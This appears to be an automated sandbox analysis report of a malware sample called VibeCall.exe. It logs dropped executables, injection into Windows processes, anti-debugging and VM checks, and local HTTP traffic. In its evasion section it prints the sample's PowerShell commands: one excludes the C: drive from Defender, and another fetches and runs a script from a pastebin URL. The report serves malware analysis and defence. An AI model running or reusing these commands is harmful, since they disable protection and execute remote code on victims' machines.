                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: VibeCall.exeStatic PE information: section name: .CLR_UEF
                      Source: VibeCall.exeStatic PE information: section name: .didat
                      Source: VibeCall.exeStatic PE information: section name: Section
                      Source: VibeCall.exeStatic PE information: section name: _RDATA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B15D2A5 pushad ; iretd 2_2_00007FFD9B15D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B27C2C5 push ebx; iretd 2_2_00007FFD9B27C2DA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B2700BD pushad ; iretd 2_2_00007FFD9B2700C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B342316 push 8B485F92h; iretd 2_2_00007FFD9B34231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B265835 push eax; ret 4_2_00007FFD9B265899
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B2600BD pushad ; iretd 4_2_00007FFD9B2600C1
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_014419B4 push ecx; ret 15_3_014419C7
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02CF525D push es; ret 15_3_02CF5264
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02CF3FD4 push ss; retf 15_3_02CF3FF5
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02CF3F89 push edi; iretd 15_3_02CF3F96
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02CF0F6A push eax; ret 15_3_02CF0F75
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02CF28EC push edi; ret 15_3_02CF28F8
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02CF10F9 push FFFFFF82h; iretd 15_3_02CF10FB
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02CF44F9 push edx; retf 15_3_02CF44FC
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02CF2C39 push ecx; ret 15_3_02CF2C59
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02CF21DC push eax; ret 15_3_02CF21DD
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02CF4D5E push esi; ret 15_3_02CF4D69
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02CF28EC push edi; ret 15_2_02CF28F8
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02CF10F9 push FFFFFF82h; iretd 15_2_02CF10FB
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02CF44F9 push edx; retf 15_2_02CF44FC
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02CF525D push es; ret 15_2_02CF5264
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02CF2C39 push ecx; ret 15_2_02CF2C59
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02CF21DC push eax; ret 15_2_02CF21DD
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02CF3FD4 push ss; retf 15_2_02CF3FF5
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02CF3F89 push edi; iretd 15_2_02CF3F96
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02CF4D5E push esi; ret 15_2_02CF4D69
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02CF0F6A push eax; ret 15_2_02CF0F75
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_006419B4 push ecx; ret 16_3_006419C7
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_006D2C39 push ecx; ret 16_3_006D2C59
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_006D28EC push edi; ret 16_3_006D28F8
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_006D10F9 push FFFFFF82h; iretd 16_3_006D10FB
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\Downloads\soundsolution_vibecall_c.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\Downloads\videosolution_vibecall_b.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\aisolution_vibecall_a.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\aisolution_vibecall_a.exeJump to dropped file

Boot Survival

Source: C:\Users\user\Desktop\VibeCall.exe | File created: C:\Users\user\aisolution_vibecall_a.exe

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (7 identical entries)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (6 identical entries)
                      Source: unknown Network traffic detected: HTTP traffic on port 59327 -> 5000
                      Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 59327
                      Source: unknown Network traffic detected: HTTP traffic on port 59368 -> 5000
                      Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 59368
                      Source: unknown Network traffic detected: HTTP traffic on port 59408 -> 5000
                      Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 59408
                      Source: unknown Network traffic detected: HTTP traffic on port 59464 -> 5000
                      Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 59464
                      Source: C:\Users\user\Desktop\VibeCall.exe Process information set: NOOPENFILEERRORBOX (4 identical entries)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (227 identical entries)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\aisolution_vibecall_a.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\OpenWith.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                      Source: C:\Users\user\aisolution_vibecall_a.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 58FB83A
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 578B83A
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\OpenWith.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\OpenWith.exeAPI/Special instruction interceptor: Address: 533A83A
                      Source: C:\Users\user\Desktop\VibeCall.exeMemory allocated: 2C9BD3E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\VibeCall.exe | Window / User API: threadDelayed 1257
                      Source: C:\Users\user\Desktop\VibeCall.exe | Window / User API: threadDelayed 6956
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7320
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2343
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2945
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 450
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8311
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1265
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exe | API coverage: 0.0 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976 | Thread sleep count: 7320 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976 | Thread sleep count: 2343 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100 | Thread sleep count: 2945 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100 | Thread sleep count: 450 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8140 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228 | Thread sleep count: 8311 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3696 | Thread sleep count: 1265 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\VibeCall.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                      Source: C:\Users\user\Desktop\VibeCall.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\OpenWith.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: powershell.exe, 00000004.00000002.2025015923.0000020B7CD34000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
                      Source: aisolution_vibecall_a.exe, 0000000F.00000003.2616935783.00000000037B0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: DisableGuestVmNetworkConnectivity
                      Source: aisolution_vibecall_a.exe, 0000000F.00000003.2616935783.00000000037B0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: EnableGuestVmNetworkConnectivity
                      Source: VibeCall.exe, 00000000.00000003.2214055798.0000030A56596000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.2170638120.0000030A56576000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll rm
                      Source: C:\Users\user\Desktop\VibeCall.exe | Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Process queried: DebugPort
                      Source: C:\Users\user\aisolution_vibecall_a.exe | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Process queried: DebugPort
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exe | Process queried: DebugPort
                      Source: C:\Users\user\aisolution_vibecall_a.exe | Code function: 15_3_01424ED5 LdrInitializeThunk,VirtualFree,15_3_01424ED5
                      Source: C:\Users\user\aisolution_vibecall_a.exe | Code function: 15_3_01427D4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_3_01427D4D
                      Source: C:\Users\user\aisolution_vibecall_a.exe | Code function: 15_3_02CF0277 mov eax, dword ptr fs:[00000030h] 15_3_02CF0277
                      Source: C:\Users\user\aisolution_vibecall_a.exe | Code function: 15_2_02CF0277 mov eax, dword ptr fs:[00000030h] 15_2_02CF0277
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Code function: 16_3_006D0277 mov eax, dword ptr fs:[00000030h] 16_3_006D0277
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Code function: 16_2_006D0277 mov eax, dword ptr fs:[00000030h] 16_2_006D0277
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exe | Code function: 17_3_01782277 mov eax, dword ptr fs:[00000030h] 17_3_01782277
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe | Code function: 26_3_02FF0283 mov eax, dword ptr fs:[00000030h] 26_3_02FF0283
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe | Code function: 32_3_02F00283 mov eax, dword ptr fs:[00000030h] 32_3_02F00283
                      Source: C:\Windows\SysWOW64\OpenWith.exe | Code function: 44_3_02A00283 mov eax, dword ptr fs:[00000030h] 44_3_02A00283
                      Source: C:\Users\user\Desktop\VibeCall.exe | Process token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Users\user\aisolution_vibecall_a.exe | Code function: 15_3_01427D4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_3_01427D4D
                      Source: C:\Users\user\aisolution_vibecall_a.exe | Code function: 15_3_0142800F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_3_0142800F
                      Source: C:\Users\user\aisolution_vibecall_a.exe | Code function: 15_3_01434B0C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_3_01434B0C
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Code function: 16_3_0062800F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_3_0062800F
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Code function: 16_3_00627D4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_3_00627D4D
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Code function: 16_3_00634B0C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_3_00634B0C
                      Source: C:\Users\user\Desktop\VibeCall.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\VibeCall.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                      Source: C:\Users\user\Desktop\VibeCall.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content"
                      Source: C:\Users\user\Desktop\VibeCall.exe | Process created: C:\Users\user\aisolution_vibecall_a.exe "C:\Users\user\aisolution_vibecall_a.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exe | Process created: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe "C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exe | Process created: C:\Users\user\Downloads\soundsolution_vibecall_c.exe "C:\Users\user\Downloads\soundsolution_vibecall_c.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exe | Process created: C:\Users\user\Downloads\videosolution_vibecall_b.exe "C:\Users\user\Downloads\videosolution_vibecall_b.exe"
                      Source: C:\Users\user\aisolution_vibecall_a.exe | Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exe | Process created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe | Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\SysWOW64\OpenWith.exe | Process created: unknown unknown
                      Source: C:\Users\user\aisolution_vibecall_a.exe | Code function: 15_3_0142781B cpuid 15_3_0142781B
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
